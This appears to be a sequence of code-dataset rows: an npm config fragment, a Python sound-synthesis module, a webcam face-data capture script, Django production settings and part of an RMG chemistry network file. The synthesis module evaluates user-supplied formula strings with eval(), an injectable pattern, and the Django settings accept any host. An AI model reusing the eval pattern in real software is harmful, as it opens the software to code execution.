"uv_library": "static_library",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"visibility": "",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\mattweb\\.node-gyp\\0.12.7",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"access": "",
"always_auth": "",
"bin_links": "true",
"browser": "",
"ca": "",
"cache": "C:\\Users\\mattweb\\AppData\\Roaming\\npm-cache",
"cache_lock_retries": "10",
"cache_lock_stale": "60000",
"cache_lock_wait": "10000",
"cache_max": "Infinity",
"cache_min": "10",
"cafile": "",
"cert": "",
"color": "true",
"depth": "Infinity",
"description": "true",
"dev": "",
"editor": "notepad.exe",
"engine_strict": "",
"fetch_retries": "2",
"fetch_retry_factor": "10",
"fetch_retry_maxtimeout": "60000",
"fetch_retry_mintimeout": "10000",
"force": "",
"git": "git",
"git_tag_version": "true",
"global": "",
"globalconfig": "C:\\Program Files\\nodejs\\etc\\npmrc",
"globalignorefile": "C:\\Program Files\\nodejs\\etc\\npmignore",
"group": "",
"heading": "npm",
"https_proxy": "",
"http___localhost_3000": "",
"if_present": "",
"ignore_scripts": "",
"init_author_email": "",
"init_author_name": "",
"init_author_url": "",
"init_license": "ISC",
"init_module": "C:\\Users\\mattweb\\.npm-init.js",
"init_version": "1.0.0",
"json": "",
"key": "",
"link": "",
"local_address": "",
"long": "",
"message": "%s",
"node_version": "0.12.7",
"npat": "",
"onload_script": "",
"optional": "true",
"parseable": "",
"prefix": "C:\\Program Files\\nodejs",
"production": "",
"proprietary_attribs": "true",
"rebuild_bundle": "true",
"registry": "https://registry.npmjs.org/",
"rollback": "true",
"save": "true",
"save_bundle": "",
"save_dev": "",
"save_exact": "",
"save_optional": "",
"save_prefix": "^",
"scope": "",
"searchexclude": "",
"searchopts": "",
"searchsort": "name",
"shell": "C:\\windows\\system32\\cmd.exe",
"shrinkwrap": "true",
"sign_git_tag": "",
"spin": "true",
"strict_ssl": "true",
"tag": "latest",
"tag_version_prefix": "v",
"tmp": "C:\\Users\\mattweb\\AppData\\Local\\Temp",
"umask": "0000",
"unicode": "true",
"unsafe_perm": "true",
"usage": "",
"user": "",
"userconfig": "C:\\Users\\mattweb\\.npmrc",
"user_agent": "npm/2.14.0 node/v0.12.7 win32 x64",
"version": "",
"versions": "",
"viewer": "browser"
}
}
| [
"mattweb@WH5003167.Adgency-Domain.Ad-Gency.com"
] | mattweb@WH5003167.Adgency-Domain.Ad-Gency.com |
4364a1093c7563e3ca1d4b13b6b23db59f3141d7 | 769d8f3aa2f112fa1b98ce989e80c5bae5dffeba | /calculations.py | 4732116e762321debba51817a3eb7c8ff4dc238d | [] | no_license | Babdus/martians | 434962e579e51a01c42055b62ace8f03d2c10e71 | f07d39a08e84bce4db9cd74e724d171815200acd | refs/heads/master | 2022-02-02T23:12:14.756536 | 2022-01-30T14:43:10 | 2022-01-30T14:43:10 | 222,629,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,526 | py | import numpy as np
import math
from scipy.stats import norm
# Constant names recognised in user-supplied formula strings.
constants = ['e', 'pi']
# numpy functions recognised in formula strings.  Order matters: longer
# names must precede their substrings (e.g. 'arcsinh' before 'arcsin'
# before 'sinh' before 'sin') because function_parser substitutes them
# with plain substring replacement.
np_functions = [
    'power',
    'abs',
    'sqrt',
    'log10',
    'log2',
    'log',
    'arcsinh',
    'arccosh',
    'arctanh',
    'arcsin',
    'arccos',
    'arctan',
    'sinh',
    'cosh',
    'tanh',
    'sin',
    'cos',
    'tan',
    'rint'
]
def function_parser(f):
    """Translate a user-supplied formula string into evaluable Python.

    Rewrites '^' to '**', wraps constant-only formulas so they broadcast
    over x, maps 'e'/'pi' to math constants and known function names to
    their numpy equivalents.  Returns the rewritten expression string,
    meant to be eval'd with x, np and math in scope.
    """
    import re  # local import keeps the module's public surface unchanged
    f = f.replace(' ', '')
    f = f.replace('^', '**')
    if 'x' not in f:
        # Constant expression: multiply by x/x so eval returns an array
        # shaped like the sample grid (resulting NaNs are cleaned by callers).
        f = f'(x/x)*({f})'
    for constant in constants:
        # Whole-word replacement only: a plain str.replace would corrupt
        # names containing 'e' or 'pi' (e.g. 'power' -> 'powmath.er').
        f = re.sub(r'\b%s\b' % constant, f'math.{constant}', f)
    f = f.replace('round', 'rint')
    # Two-pass placeholder substitution so that replacing 'sin' cannot
    # clobber the 'sin' inside 'arcsin', etc.
    for i, func in enumerate(np_functions):
        f = f.replace(func, chr(i + 65))
    for i in range(len(np_functions)):
        f = f.replace(chr(i + 65), f'np.{np_functions[i]}')
    return f
def get_samples(length, sample_rate, start=0):
    """Return evenly spaced sample times covering [start, start+length)."""
    count = int(sample_rate * length)
    stop = start + length
    return np.linspace(start, stop, count, endpoint=False)
def parse_frequency_function(frequency_function_string, duration, sample_rate):
    """Evaluate a user formula string into a per-sample frequency array.

    NOTE: the local name 'x' is load-bearing — the expression produced by
    function_parser refers to x (and to np/math) when eval'd.  NaNs (e.g.
    from the x/x wrapper at x=0) are replaced by 0.
    """
    f = function_parser(frequency_function_string)
    x = get_samples(duration, sample_rate)
    frequency_function = eval(f)
    frequency_function = np.nan_to_num(frequency_function, nan=0.0)
    return frequency_function
def get_sine_wave(frequency, duration, sample_rate, amplitude=1):
    """Return amplitude * sin(2*pi*frequency*t) over the sample grid."""
    t = get_samples(duration, sample_rate)
    angular = 2 * np.pi * frequency
    return amplitude * np.sin(angular * t)
def initialize_signal(duration, sample_rate):
    """Return an all-zero signal buffer matching the sample grid."""
    template = get_samples(duration, sample_rate)
    return np.zeros_like(template)
def initialize_formant_function(n_overtones, value=0.0):
    """Return an array of n_overtones entries, all set to value."""
    return np.repeat(value, n_overtones)
def get_formant(n_overtones, mu, sigma, amplitude):
    """Gaussian weighting over overtone numbers 1..n_overtones, peak=amplitude."""
    overtone_numbers = get_samples(n_overtones, 1, start=1)
    curve = norm.pdf(overtone_numbers, mu, sigma)
    return amplitude * (curve / curve.max())
def normalize(array):
    """Scale the array so its maximum element equals 1."""
    peak = np.max(array)
    return array / peak
def add_overtones_to_signal(signal, frequency_function, duration, sample_rate, formants, n_overtones):
    """Rebuild the signal as a sum of n_overtones harmonics shaped by formants.

    Each formant dict ({'mu', 'sigma', 'amplitude'}) contributes a Gaussian
    weighting over overtone numbers; with no formants all overtones get
    equal weight.  The rebuilt signal is rescaled to the incoming signal's
    peak.  Returns (signal, overtone_amplitudes).
    """
    formant_functions = []
    for formant in formants:
        formant_functions.append(get_formant(n_overtones, formant['mu'], formant['sigma'], formant['amplitude']))
    # Start from all-ones only when there are no formants to accumulate.
    overtones = initialize_formant_function(n_overtones, value=(1.0 if len(formant_functions) == 0 else 0.0))
    for formant_function in formant_functions:
        overtones += formant_function
    overtones = normalize(overtones)
    # Remember the previous peak so the rebuilt signal keeps its loudness.
    last_signal_max = np.max(signal)
    signal = initialize_signal(duration, sample_rate)
    for overtone, amplitude in enumerate(overtones, start=1):
        signal += get_sine_wave(frequency_function * overtone, duration, sample_rate, amplitude)
    return (signal * last_signal_max) / np.max(signal), overtones
def reverse_signal(signal):
    """Return the signal played backwards."""
    return signal[::-1]
def change_sign(signal):
    """Return the signal with inverted polarity."""
    return np.negative(signal)
def add_noise(signal, duration, sample_rate, noise_frequency, noise_amount):
    """Mix a randomly amplitude-modulated sine ("noise") into the signal.

    Non-deterministic: each call draws fresh uniform random amplitudes.
    Mutates the caller's array in place, then returns it re-normalized
    to peak 1.
    """
    samples_1 = np.linspace(0, duration, int(sample_rate * duration), endpoint=False)
    noise_wave = np.sin(2 * np.pi * noise_frequency * samples_1)
    noise_wave *= np.random.rand(samples_1.shape[0]) * noise_amount
    signal += noise_wave  # in-place accumulation
    return normalize(signal)
def shift_signal(signal, shift, sample_rate):
    """Overlay the signal with a copy of itself delayed by `shift` seconds."""
    delay = int(sample_rate * shift)
    # Zero-pad on both sides, then keep the first len(signal) samples: the
    # net effect is `delay` leading zeros followed by the signal's head.
    delayed = np.pad(signal, (delay,), 'constant', constant_values=(0, 0))[:signal.shape[0]]
    signal += delayed
    return normalize(signal)
def add_gain(signal, gain):
    """Amplify the signal in place, then hard-clip the result to [-1, 1]."""
    signal *= gain  # in-place, preserving the original's mutation contract
    return np.clip(signal, -1, 1)
def parse_amplitude_function(f, duration, sample_rate):
    """Evaluate a user formula string into a per-sample amplitude array.

    NOTE: the local name 'x' is load-bearing — the expression produced by
    function_parser refers to x (and to np/math) when eval'd.
    """
    f = function_parser(f)
    x = np.linspace(0, duration, int(sample_rate * duration), endpoint=False)
    y = eval(f)
    return y
def modify_amplitude_with_function(signal, y):
    """Apply a per-sample amplitude envelope to the signal in place."""
    np.multiply(signal, y, out=signal)
    return signal
def get_attack_curve(attack_duration, attack_degree, duration, sample_rate):
    """Rising envelope: (t / attack_duration) ** (2**attack_degree), capped at 1."""
    t = get_samples(duration, sample_rate)
    exponent = 2 ** attack_degree
    curve = np.power(t, exponent) / np.power(attack_duration, exponent)
    return np.where(curve > 1, 1, curve)
def get_decay_curve(decay_start, decay_duration, decay_degree, duration, sample_rate):
    """Falling envelope over the full signal length.

    The decay shape is computed over decay_duration, clamped to [0, 1],
    then edge-padded so it holds its first value before the decay starts
    and its last value afterwards, and finally truncated to the total
    signal length.
    """
    samples = get_samples(decay_duration, sample_rate)
    decay_degree = -decay_degree  # mirror of the attack exponent
    decay_curve = 1 - np.power(samples, 2 ** decay_degree) / np.power(decay_duration, 2 ** decay_degree)
    decay_curve = np.where(decay_curve > 1, 1, decay_curve)
    decay_curve = np.where(decay_curve < 0, 0, decay_curve)
    n_samples_before_start_decay = int(decay_start * sample_rate)
    n_samples_after_end_decay = int(sample_rate * duration) - n_samples_before_start_decay - int(
        sample_rate * decay_duration)
    # The tail padding can come out negative if the decay window extends
    # past the signal end; clamp it to zero.
    n_samples_after_end_decay = n_samples_after_end_decay if n_samples_after_end_decay > 0 else 0
    decay_curve = np.pad(decay_curve, (n_samples_before_start_decay, n_samples_after_end_decay), 'edge')
    decay_curve = decay_curve[:int(sample_rate * duration)]
    return decay_curve
def apply_attack_and_decay(signal, attack_curve, decay_curve):
    """Multiply the signal (in place) by the combined attack/decay envelope."""
    envelope = attack_curve * decay_curve
    signal *= envelope
    return signal
def signal_pipeline(properties, sample_rate):
    """Build one signal from a properties dict.

    Generates the base tone from the frequency formula, applies the
    timbre (overtones shaped by formants), then applies each modifier in
    properties['modifier_properties'] in order.  Returns the final signal.
    """
    duration = properties['duration']
    frequency_function_string = properties['frequency_function_string']
    frequency_function = parse_frequency_function(frequency_function_string, duration, sample_rate)
    signal = get_sine_wave(frequency_function, duration, sample_rate)
    n_overtones = properties['timbre']['n_overtones']
    formants = properties['timbre']['formants']
    signal, overtones = add_overtones_to_signal(signal, frequency_function, duration, sample_rate, formants,
                                                n_overtones)
    # Modifiers are dispatched by the (single) key of each entry.
    for modifier_properties in properties['modifier_properties']:
        if 'Reverse' in modifier_properties:
            if modifier_properties['Reverse']['horizontal']:
                signal = reverse_signal(signal)
            if modifier_properties['Reverse']['vertical']:
                signal = change_sign(signal)
        elif 'Overdrive' in modifier_properties:
            signal = add_gain(signal, modifier_properties['Overdrive']['gain'])
        elif 'Shifted copy' in modifier_properties:
            signal = shift_signal(signal, modifier_properties['Shifted copy']['shift'], sample_rate)
        elif 'Noise' in modifier_properties:
            signal = add_noise(signal, duration, sample_rate, modifier_properties['Noise']['noise_frequency'],
                               modifier_properties['Noise']['noise_amount'])
        elif 'Amplitude custom function' in modifier_properties:
            y = parse_amplitude_function(modifier_properties['Amplitude custom function']['f'], duration, sample_rate)
            signal = modify_amplitude_with_function(signal, y)
        elif 'Amplitude envelope' in modifier_properties:
            attack_curve = get_attack_curve(modifier_properties['Amplitude envelope']['attack_duration'],
                                            modifier_properties['Amplitude envelope']['attack_degree'], duration,
                                            sample_rate)
            decay_curve = get_decay_curve(modifier_properties['Amplitude envelope']['decay_start'],
                                          modifier_properties['Amplitude envelope']['decay_duration'],
                                          modifier_properties['Amplitude envelope']['decay_degree'], duration,
                                          sample_rate)
            signal = apply_attack_and_decay(signal, attack_curve, decay_curve)
    return signal
def mix(signals, sample_rate, bpm, beats_per_bar, signal_index_matrix):
    """Mix scheduled signals into a single one-bar buffer.

    signals: sequence of dicts, each with a 'signal' ndarray.
    signal_index_matrix: one column per beat; each column lists indexes
    into `signals` (or None for an empty slot) whose signal starts on
    that beat.  Signals running past the end of the bar are truncated.

    Returns (mixed_signal, bar_duration_seconds).
    """
    beat_duration = 60 / bpm
    sample_per_beat = int(beat_duration * sample_rate)
    sample_per_bar = sample_per_beat * beats_per_bar
    # Derive the bar duration from the rounded sample count so it matches
    # the buffer that is actually produced.
    bar_duration = (sample_per_beat * beats_per_bar) / sample_rate
    final_signal = np.zeros(sample_per_bar)
    for beat, column in enumerate(signal_index_matrix):
        start = sample_per_beat * beat  # hoisted: invariant per column
        for i_signal in column:
            if i_signal is None:
                continue
            signal = signals[i_signal]['signal']
            if len(signal) + start > sample_per_bar:
                # Truncate anything that would spill past the bar.
                final_signal[start:] += signal[:sample_per_bar - start]
            else:
                final_signal[start:start + len(signal)] += signal
    return final_signal, bar_duration
| [
"babdusi@gmail.com"
] | babdusi@gmail.com |
88be4411af61e5a31ecce0d735c030caace852a6 | 4ab2dcfbd4541639f96922ad684f558c64c9ba28 | /facedata.py | 33f99518985dd6c525ed800d8c9d042de49a3529 | [] | no_license | adirayer/Face-Recognition | d3d1839f4aa414c78d2078cbb8cd8d439bf05ba3 | 913abce48f1bff83e1a978417a1c5e402f806824 | refs/heads/main | 2023-06-10T21:19:57.547372 | 2021-07-06T07:34:03 | 2021-07-06T07:34:03 | 383,380,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,975 | py | # Write a Python Script that captures images from your webcam video stream
# Extracts all Faces from the image frame (using haarcascades)
# Stores the Face information into numpy arrays
# 1. Read and show video stream, capture images
# 2. Detect Faces and show bounding box (haarcascade)
# 3. Flatten the largest face image(gray scale) and save in a numpy array
# 4. Repeat the above for multiple people to generate training data
import cv2
import numpy as np
#Init Camera
cap = cv2.VideoCapture(0)
# Face Detection
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
skip = 0
face_data = []
dataset_path = './data/'
file_name = input("Enter the name of the person : ")
while True:
ret,frame = cap.read()
if ret==False:
continue
gray_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(frame,1.3,5)
if len(faces)==0:
continue
faces = sorted(faces,key=lambda f:f[2]*f[3])
# Pick the last face (because it is the largest face acc to area(f[2]*f[3]))
for face in faces[-1:]:
x,y,w,h = face
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#Extract (Crop out the required face) : Region of Interest
offset = 10
face_section = frame[y-offset:y+h+offset,x-offset:x+w+offset]
face_section = cv2.resize(face_section,(100,100))
skip += 1
if skip%10==0:
face_data.append(face_section)
print(len(face_data))
cv2.imshow("Frame",frame)
cv2.imshow("Face Section",face_section)
key_pressed = cv2.waitKey(1) & 0xFF
if key_pressed == ord('q'):
break
# Convert our face list array into a numpy array
face_data = np.asarray(face_data)
face_data = face_data.reshape((face_data.shape[0],-1))
print(face_data.shape)
# Save this data into file system
np.save(dataset_path+file_name+'.npy',face_data)
print("Data Successfully save at "+dataset_path+file_name+'.npy')
cap.release()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | noreply@github.com |
d7b04cf9763076a4c1f742e7b8007d7ecbca812c | 5211bf6e6178b6130d8fc167fd910a50be88bee2 | /piglatin/settings_production.py | 9baf9da65cf9ea830e1ab47f9d2287cd37f8a5be | [] | no_license | velikooutro/django_translator | fd9c576615093fa56441be3dc2d94789d9291d3f | dc358516d66f57c1eb96bed8f36c1c16b8620103 | refs/heads/master | 2021-01-23T12:34:45.867714 | 2017-06-02T17:51:33 | 2017-06-02T17:51:33 | 93,176,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py |
# Inherit from standard settings file for defaults
from piglatin.settings import *
# Everything below will override our standard settings:
# Parse database configuration from $DATABASE_URL
import dj_database_url
DATABASES['default'] = dj_database_url.config()
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Set debug to False
DEBUG = False
# Static asset configuration
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage' | [
"veliko.outro@gmail.com"
] | veliko.outro@gmail.com |
12098a4349966f1bb91731bacb395b298b3dec81 | 04803c70bb97012b7d500a177ac0240fb2ddbe38 | /3heptane_pdep/pdep/network42_1.py | ba15fe7bcaabbec6ac0c67a81fd946ab69ff1f2e | [] | no_license | shenghuiqin/chpd | 735e0415f6688d88579fc935459c1b0f53596d1d | 396ba54629036e3f2be0b3fabe09b78c90d56939 | refs/heads/master | 2023-03-01T23:29:02.118150 | 2019-10-05T04:02:23 | 2019-10-05T04:02:23 | 192,084,217 | 0 | 0 | null | 2019-06-18T18:33:13 | 2019-06-15T13:52:28 | HTML | UTF-8 | Python | false | false | 51,612 | py | species(
label = 'CCCC(CCC)O[O](138)',
structure = SMILES('CCCC(CCC)O[O]'),
E0 = (-164.605,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4082.6,'J/mol'), sigma=(7.30891,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=637.69 K, Pc=23.73 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.385645,0.0992146,-7.63202e-05,3.28023e-08,-6.09818e-12,-19642.1,35.265], Tmin=(100,'K'), Tmax=(1218.12,'K')), NASAPolynomial(coeffs=[12.329,0.0574631,-2.49073e-05,4.66449e-09,-3.23359e-13,-22739.7,-28.5844], Tmin=(1218.12,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-164.605,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(552.912,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'O2(2)',
structure = SMILES('[O][O]'),
E0 = (-8.62178,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1483.7],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (31.9988,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(887.157,'J/mol'), sigma=(3.467,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53764,-0.00122827,5.36759e-06,-4.93128e-09,1.45955e-12,-1037.99,4.6718], Tmin=(100,'K'), Tmax=(1087.71,'K')), NASAPolynomial(coeffs=[3.16427,0.00169454,-8.00335e-07,1.5903e-10,-1.14891e-14,-1048.45,6.08303], Tmin=(1087.71,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.62178,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""O2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[CH]CCC(73)',
structure = SMILES('CCC[CH]CCC'),
E0 = (-21.1865,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3025,407.5,1350,352.5,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (99.194,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3350.7,'J/mol'), sigma=(6.3658,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=523.37 K, Pc=29.47 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.869629,0.0703718,-3.49835e-05,7.97988e-09,-7.11975e-13,-2437.92,29.442], Tmin=(100,'K'), Tmax=(2507.38,'K')), NASAPolynomial(coeffs=[23.6823,0.0339797,-1.3213e-05,2.19165e-09,-1.34869e-13,-13878.2,-101.587], Tmin=(2507.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-21.1865,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(507.183,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJCC)"""),
)
species(
label = 'CCC[CH]O[O](143)',
structure = SMILES('CCC[CH]O[O]'),
E0 = (107.961,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,492.5,1135,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,180,180],'cm^-1')),
HinderedRotor(inertia=(0.120261,'amu*angstrom^2'), symmetry=1, barrier=(2.76503,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120067,'amu*angstrom^2'), symmetry=1, barrier=(2.76059,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120388,'amu*angstrom^2'), symmetry=1, barrier=(2.76796,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.48129,'amu*angstrom^2'), symmetry=1, barrier=(11.0658,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.80224,0.0553008,-3.67942e-05,-1.19722e-08,2.59231e-11,13057,21.9545], Tmin=(100,'K'), Tmax=(531.454,'K')), NASAPolynomial(coeffs=[5.7889,0.0367206,-1.66008e-05,3.14924e-09,-2.19362e-13,12471.9,3.72327], Tmin=(531.454,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(107.961,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOOH) + radical(ROOJ)"""),
)
species(
label = 'npropyl(70)',
structure = SMILES('[CH2]CC'),
E0 = (87.0621,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000],'cm^-1')),
HinderedRotor(inertia=(0.0928812,'amu*angstrom^2'), symmetry=1, barrier=(2.13552,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.092914,'amu*angstrom^2'), symmetry=1, barrier=(2.13628,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (43.0877,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2218.31,'J/mol'), sigma=(4.982,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.02816,0.0147023,2.40511e-05,-3.6674e-08,1.38612e-11,10512.1,12.4699], Tmin=(100,'K'), Tmax=(984.463,'K')), NASAPolynomial(coeffs=[6.16542,0.0184495,-6.7903e-06,1.23049e-09,-8.63868e-14,9095.06,-6.676], Tmin=(984.463,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(87.0621,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""npropyl""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,25472.7,-0.459785], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[C](CCC)O[O](144)',
structure = SMILES('CCC[C](CCC)O[O]'),
E0 = (22.2936,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([360,370,350,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,492.5,1135,1000,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
